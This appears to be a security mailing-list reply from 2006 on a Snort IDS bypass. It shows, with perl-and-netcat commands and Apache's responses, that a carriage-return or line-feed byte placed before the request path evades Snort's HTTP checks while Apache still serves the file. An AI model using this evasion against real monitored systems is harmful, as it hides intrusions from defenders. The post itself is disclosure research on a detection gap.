Re: New Snort Bypass - Patch - Bypass of Patch

[Sigint Consulting <info () sigint-consulting com>]

> I performed this research while developing NFR's web signatures, and found
> that all web servers I tested (several years ago) handled end-of-lines using
> "\x0d\x0a" and "\x0a" interchangeably. If you find a web server that
> interprets "index.php" in the example above as an actual filename, I for one
> would be very interested in knowing about it.
>
> Dodge

Apache 1.3.34 (debian package) returns index.html from my request as
normal even though the file name has a \x0d before it. So in Apache's
case it appears that the \x0d character will not mess up the request to
the webserver, atleast in this case AND still bypasses the snort check.
Now obviously the \x90\x90 are going to ruin the request because no
such file exists by that name so they were left out of this example,
but this may mean the \x0d character would not mangle a real malicious
request to apache.

$ perl -e 'print "GET \x0d/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
HTTP/1.1 200 OK
Date: Mon, 05 Jun 2006 07:25:47 GMT
Server: Apache/1.3.34 (Debian)
Last-Modified: Sat, 03 Jun 2006 09:24:26 GMT
ETag: "6f9d3-4d-4481554a"
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: text/html; charset=iso-8859-1

<META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding .
. . 
$

Further research on the snort vulnerability reveals that the \x0a
character will also evade the snort preprocessor AND apache will return
a valid response. (Testing \x0a before a malicious unicode string did
not generate a snort alert)

$ perl -e 'print "GET \x0a/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding .
. .
$

Chris

--------------------------------
www.sigint-consulting.com
info () sigint-consulting com

Charlotte, North Carolina 
Information Security Consulting
--------------------------------